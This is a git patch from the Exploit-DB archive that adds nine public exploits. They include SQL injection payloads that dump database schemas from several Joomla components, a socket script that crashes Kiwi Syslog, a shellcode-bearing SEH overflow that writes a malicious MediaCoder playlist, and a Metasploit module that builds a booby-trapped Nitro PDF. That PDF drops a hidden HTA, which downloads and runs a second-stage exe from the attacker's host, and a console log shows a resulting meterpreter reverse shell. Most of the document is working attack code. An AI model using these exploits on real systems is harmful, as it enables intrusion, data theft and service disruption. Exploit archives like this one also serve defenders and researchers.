From a600aa05cde29e7a6fa137efebf63eee26013045 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 3 Aug 2017 05:01:30 +0000
Subject: [PATCH] DB: 2017-08-03

9 new exploits

Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service

MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)

Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)
Entrepreneur B2B Script - 'pid' Parameter SQL Injection
Joomla! Component SIMGenealogy 2.1.5 - SQL Injection
Joomla! Component PHP-Bridge 1.2.3 - SQL Injection
Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection
Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection
Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection
---
 files.csv                        |   9 ++
 platforms/php/webapps/42412.txt  |  11 ++
 platforms/php/webapps/42413.txt  |  15 +++
 platforms/php/webapps/42414.txt  |  16 +++
 platforms/php/webapps/42415.txt  |  15 +++
 platforms/php/webapps/42416.txt  |  16 +++
 platforms/php/webapps/42417.txt  |  18 +++
 platforms/windows/dos/42411.py   |  55 ++++++++
 platforms/windows/local/41971.py |  45 +++++++
 platforms/windows/local/42418.rb | 219 +++++++++++++++++++++++++++++++
 10 files changed, 419 insertions(+)
 create mode 100755 platforms/php/webapps/42412.txt
 create mode 100755 platforms/php/webapps/42413.txt
 create mode 100755 platforms/php/webapps/42414.txt
 create mode 100755 platforms/php/webapps/42415.txt
 create mode 100755 platforms/php/webapps/42416.txt
 create mode 100755 platforms/php/webapps/42417.txt
 create mode 100755 platforms/windows/dos/42411.py
 create mode 100755 platforms/windows/local/41971.py
 create mode 100755 platforms/windows/local/42418.rb

diff --git a/files.csv b/files.csv
index 181a9e826..a94d88ef4 100644
--- a/files.csv
+++ b/files.csv
@@ -5635,6 +5635,7 @@ id,file,description,date,author,platform,type,port
 42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
 42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
+42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9124,6 +9125,7 @@ id,file,description,date,author,platform,type,port
 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
+41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
 41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
@@ -9166,6 +9168,7 @@ id,file,description,date,author,platform,type,port
 42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
+42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38210,3 +38213,9 @@ id,file,description,date,author,platform,type,port
 42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
+42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
+42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
+42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/42412.txt b/platforms/php/webapps/42412.txt
new file mode 100755
index 000000000..b19558aec
--- /dev/null
+++ b/platforms/php/webapps/42412.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Entrepreneur B2B Script - 'pid' Parameter SQL Injection
+# Date: 2017-08-02
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://readymadeb2bscript.com/
+# Version: All Version
+
+
+Exploit :
+http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command]
+
+
diff --git a/platforms/php/webapps/42413.txt b/platforms/php/webapps/42413.txt
new file mode 100755
index 000000000..ca27f7c39
--- /dev/null
+++ b/platforms/php/webapps/42413.txt
@@ -0,0 +1,15 @@
+# # # # #
+# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : https://www.simbunch.com/
+# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
+# Demo: https://www.simbunch.com/demos/simgenealogy
+# Version: 2.1.5
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42414.txt b/platforms/php/webapps/42414.txt
new file mode 100755
index 000000000..4c935c878
--- /dev/null
+++ b/platforms/php/webapps/42414.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://www.henryschorradt.de/
+# Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
+# Demo: http://www.henryschorradt.de/joomla-php-bridge/
+# Version: 1.2.3
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
+# -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42415.txt b/platforms/php/webapps/42415.txt
new file mode 100755
index 000000000..8b910a6d2
--- /dev/null
+++ b/platforms/php/webapps/42415.txt
@@ -0,0 +1,15 @@
+# # # # #
+# Exploit Title: Joomla! Component LMS King Professional v3.2.4.0 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://king-products.net/
+# Software: https://extensions.joomla.org/extensions/extension/living/education-a-culture/lms-king-professional-for-joomla/
+# Demo: http://demo.king-products.net/
+# Version: 3.2.4.0
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42416.txt b/platforms/php/webapps/42416.txt
new file mode 100755
index 000000000..c3632a81f
--- /dev/null
+++ b/platforms/php/webapps/42416.txt
@@ -0,0 +1,16 @@
+# # # # #
+# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://joomlashowroom.com/
+# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
+# Demo: http://demo3.joomlashowroom.com/
+# Version: 4.1.3
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
+# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42417.txt b/platforms/php/webapps/42417.txt
new file mode 100755
index 000000000..f6d115951
--- /dev/null
+++ b/platforms/php/webapps/42417.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component Ultimate Property Listing v1.0.2 - SQL Injection
+# Dork: N/A
+# Date: 02.08.2017
+# Vendor : http://faboba.com/
+# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/ultimate-property-listing/
+# Demo: http://demoupl.faboba.com/
+# Version: 1.0.2
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=[SQL]
+# -109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelocation1_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelisting=[SQL]
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/dos/42411.py b/platforms/windows/dos/42411.py
new file mode 100755
index 000000000..8b9fe2665
--- /dev/null
+++ b/platforms/windows/dos/42411.py
@@ -0,0 +1,55 @@
+# Exploit Title: Solarwinds Kiwi Syslog 9.6.1.6 - Remote Denial of Service (Type Mismatch)
+# Date: 26/05/2017
+# Exploit Author: Guillaume Kaddouch
+#   Twitter: @gkweb76
+#   Blog: https://networkfilter.blogspot.com
+#   GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.solarwinds.com/
+# Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
+# Version: 9.6.1.6
+# Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
+# Category: DoS
+
+"""
+Disclosure Timeline:
+--------------------
+2017-05-20: Vulnerability discovered
+2017-05-26: Vendor contacted
+2017-05-31: Vendor answered (technical support)
+2017-05-31: Vendor contacted (no answer)
+2017-08-01: Exploit published
+
+
+Description :
+-------------
+A remote Denial of Service exists in Kiwi Syslog 9.6.1.6 in the TCP listener.
+Apparently any data sent to it make it crash because of a Type Mismatch error.
+The syslog TCP listener is disabled by default.
+
+
+Instructions:
+-------------
+- Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
+- Run this exploit locally or from your remote attacking machine.
+"""
+
+#!/usr/bin/python
+import socket
+
+host    = "10.0.0.56"
+port    = 1468
+
+buffer  = "crash please?"
+
+try:
+        print "[*] Connecting to %s:%d" % (host, port)
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host, port))
+
+        print "[*] Sending buffer... (%d bytes)" % len(buffer)
+        s.send(buffer)
+        s.close()
+
+        print "[*] Done."
+except:
+        print "[-] Error connecting"
diff --git a/platforms/windows/local/41971.py b/platforms/windows/local/41971.py
new file mode 100755
index 000000000..da2b32fe0
--- /dev/null
+++ b/platforms/windows/local/41971.py
@@ -0,0 +1,45 @@
+#!/usr/bin/python
+# Exploit Title     : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
+# Date              : 2017-05-08
+# Exploit Author    : Muhann4d
+# Vendor Homepage   : http://www.mediacoderhq.com
+# Software Link     : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
+# Tested Version    : 0.8.48.5888
+# Category          : Local Buffer Overflow
+# Tested on OS      : Windows 7 Professional SP1 32bit
+
+
+print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d"
+from struct import pack
+ 
+junk = "http://" + "\x41" * 361
+nseh = pack('<I',0x909006eb)
+seh = pack('<I',0x66017187)
+nops= "\x90" * 20
+shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b"
+"\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17"
+"\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee"
+"\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe"
+"\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16"
+"\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66"
+"\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14"
+"\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02"
+"\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f"
+"\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29"
+"\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9"
+"\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5"
+"\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1"
+"\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")
+
+junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))
+exploit = junk + nseh + seh + nops + shell + junkD
+  
+try:
+    file= open("Exploit.m3u",'w')
+    file.write(exploit)
+    file.close()
+    raw_input("\nExploit has been created!\n")
+except:
+    print "There has been an Error"
+	
diff --git a/platforms/windows/local/42418.rb b/platforms/windows/local/42418.rb
new file mode 100755
index 000000000..9fb59a61d
--- /dev/null
+++ b/platforms/windows/local/42418.rb
@@ -0,0 +1,219 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
+      'Description'    => %q{
+          This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
+          PDF Reader version 11. The saveAs() Javascript API function allows for writing
+          arbitrary files to the file system. Additionally, the launchURL() function allows
+          an attacker to execute local files on the file system and bypass the security dialog
+
+          Note: This is 100% reliable.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'mr_me <steven[at]srcincite.io>',         # vulnerability discovery and exploit
+        'Brendan Coles <bcoles [at] gmail.com>',  # hidden hta tricks!
+        'sinn3r'                                  # help with msf foo!
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-7442' ],
+          [ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ],           # public advisory #1
+          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ],    # public advisory #2 (verified and acquired by SSD)
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => false
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # truly universal
+          [ 'Automatic', { } ],
+        ],
+      'DisclosureDate' => 'Jul 24 2017',
+      'DefaultTarget'  => 0))
+
+      register_options([
+        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
+        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
+      ])
+      deregister_options('SSL', 'SSLVersion', 'SSLCert')
+  end
+
+  def build_vbs(url, stager_name)
+    name_xmlhttp  = rand_text_alpha(2)
+    name_adodb    = rand_text_alpha(2)
+    vbs           = %Q|<head><hta:application
+    applicationname="#{@payload_name}"
+    border="none"
+    borderstyle="normal"
+    caption="false"
+    contextmenu="false"
+    icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
+    maximizebutton="false"
+    minimizebutton="false"
+    navigable="false"
+    scroll="false"
+    selection="false"
+    showintaskbar="No"
+    sysmenu="false"
+    version="1.0"
+    windowstate="Minimize"></head>
+    <style>* { visibility: hidden; }</style>
+    <script language="VBScript">
+    window.resizeTo 1,1
+    window.moveTo -2000,-2000
+    </script>
+    <script type="text/javascript">setTimeout("window.close()", 5000);</script>
+    <script language="VBScript">
+    On Error Resume Next
+    Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
+    #{name_xmlhttp}.open "GET","http://#{url}",False
+    #{name_xmlhttp}.send
+    Set #{name_adodb} = CreateObject("ADODB.Stream")
+    #{name_adodb}.Open
+    #{name_adodb}.Type=1
+    #{name_adodb}.Write #{name_xmlhttp}.responseBody
+    #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
+    set shellobj = CreateObject("wscript.shell")
+    shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
+    </script>|
+    vbs.gsub!(/    /,'')
+    return vbs
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ /\.exe/
+      print_status("Sending second stage payload")
+      return if ((p=regenerate_payload(cli)) == nil)
+      data = generate_payload_exe( {:code=>p.encoded} )
+      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
+      return
+    end
+  end
+
+  def exploit
+    # In order to save binary data to the file system the payload is written to a .vbs
+    # file and execute it from there.
+    @payload_name = rand_text_alpha(4)
+    @temp_folder  = "/Windows/Temp"
+    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
+    if datastore['SRVHOST'] == '0.0.0.0'
+      lhost = Rex::Socket.source_address('50.50.50.50')
+    else
+      lhost = datastore['SRVHOST']
+    end
+    payload_src  = lhost
+    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
+    stager_name = rand_text_alpha(6) + ".vbs"
+    pdf = %Q|%PDF-1.7
+    4 0 obj
+    <<
+    /Length 0
+    >>
+    stream
+    |
+    pdf << build_vbs(payload_src, stager_name)
+    pdf << %Q|
+    endstream endobj
+    5 0 obj
+    <<
+    /Type /Page
+    /Parent 2 0 R
+    /Contents 4 0 R
+    >>
+    endobj
+    1 0 obj
+    <<
+    /Type /Catalog
+    /Pages 2 0 R
+    /OpenAction [ 5 0 R /Fit ]
+      /Names <<
+        /JavaScript <<
+          /Names [ (EmbeddedJS)
+            <<
+              /S /JavaScript
+              /JS (
+                    this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
+                    app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
+              )
+            >>
+          ]
+        >>
+      >>
+    >>
+    endobj
+    2 0 obj
+    <</Type/Pages/Count 1/Kids [ 5 0 R ]>>
+    endobj
+    3 0 obj
+    <<>>
+    endobj
+    xref
+    0 6
+    0000000000 65535 f
+    0000000166 00000 n
+    0000000244 00000 n
+    0000000305 00000 n
+    0000000009 00000 n
+    0000000058 00000 n
+    trailer <<
+    /Size 6
+    /Root 1 0 R
+    >>
+    startxref
+    327
+    %%EOF|
+    pdf.gsub!(/    /,'')
+    file_create(pdf)
+    super
+  end
+end
+
+=begin
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
+[*] Processing scripts/nitro.rc for ERB directives.
+resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
+resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (scripts/nitro.rc)> set LHOST 172.16.175.1
+LHOST => 172.16.175.1
+resource (scripts/nitro.rc)> exploit
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 172.16.175.1:4444 
+msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
+[*] Using URL: http://0.0.0.0:8080/
+[*] Local IP: http://192.168.100.4:8080/
+[*] Server started.
+[*] 192.168.100.4    nitro_reader_jsapi - Sending second stage payload
+[*] Sending stage (957487 bytes) to 172.16.175.232
+[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
+[+] Deleted C:/Windows/Temp/UOIr.hta
+
+msf exploit(nitro_reader_jsapi) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 2412 created.
+Channel 2 created.
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Users\researcher\Desktop>
+=end
\ No newline at end of file